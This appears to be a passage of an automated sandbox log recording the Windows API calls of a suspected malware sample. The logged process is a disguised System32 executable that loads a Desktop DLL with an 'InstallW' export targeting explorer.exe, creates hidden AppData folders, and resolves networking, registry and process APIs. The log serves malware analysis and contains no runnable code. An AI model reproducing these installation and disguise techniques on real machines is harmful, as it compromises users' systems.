(dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.425] SetLastError (dwErrCode=0x0) [0035.425] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.426] SetLastError (dwErrCode=0x0) [0035.426] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.427] GetLastError () returned 0x0 [0035.427] SetLastError (dwErrCode=0x0) [0035.444] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.444] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.444] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.445] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f690 | out: lpSystemTimeAsFileTime=0x30f690*(dwLowDateTime=0xe2d0bc70, dwHighDateTime=0x1d3dfba)) [0035.445] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f5c8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.445] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f4b0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.445] GetLastError () returned 0x0 [0035.446] GetLastError () returned 0x0 [0035.446] GetLastError () returned 0x0 [0035.446] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.446] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.446] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.446] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.446] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.446] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.446] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.446] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.446] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.446] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.446] GetLastError () returned 0xb7 [0035.446] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.446] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.446] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.446] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.446] wsprintfA (in: param_1=0x30f330, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.446] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.446] wsprintfA (in: param_1=0x30f22c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.446] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.447] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.447] CloseHandle (hObject=0x74) returned 1 [0035.447] GetLastError () returned 0x0 [0035.447] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.447] GetLastError () returned 0x0 [0035.447] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.447] GetSystemDirectoryA (in: lpBuffer=0x30f330, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.447] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.447] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.447] CloseHandle (hObject=0x74) returned 1 [0035.447] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.447] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.447] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.449] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.449] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.449] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.449] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.449] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.449] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.449] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.449] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.449] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.449] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.449] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.449] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.449] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.449] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.449] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.450] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.451] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.451] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.451] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.451] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.451] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.451] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.451] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.451] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.452] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.452] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.452] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.452] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.452] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.452] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.452] Entry () [0035.452] GetMessageA (lpMsg=0x30f9b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 144 os_tid = 0xdc4 [0036.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.545] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.546] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.546] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.546] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.546] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.546] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.546] GetCurrentThreadId () returned 0xdc4 Process: id = "57" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f6c0" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"explorer.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2504 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2505 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2506 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2507 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2508 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2509 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2510 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2511 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2512 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 2513 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2514 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2515 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2516 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2517 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2518 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2519 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2520 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2521 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2522 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2523 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2524 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2525 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2526 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2527 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2528 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2529 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2530 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2531 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2532 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2533 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2534 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2535 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2536 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2537 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2538 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2539 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2540 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2541 start_va = 0x1200000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2542 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2543 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2544 start_va = 0x1370000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Thread: id = 120 os_tid = 0xd34 [0035.482] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f66c | out: lpSystemTimeAsFileTime=0x16f66c*(dwLowDateTime=0xe2d57f30, dwHighDateTime=0x1d3dfba)) [0035.482] GetCurrentProcessId () returned 0xd30 [0035.482] GetCurrentThreadId () returned 0xd34 [0035.482] GetTickCount () returned 0x17fe8 [0035.482] QueryPerformanceCounter (in: lpPerformanceCount=0x16f664 | out: lpPerformanceCount=0x16f664*=374518063) returned 1 [0035.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.483] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.483] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.483] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.483] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.483] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.483] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.484] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.484] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.484] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.484] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.484] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.484] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.485] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.485] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 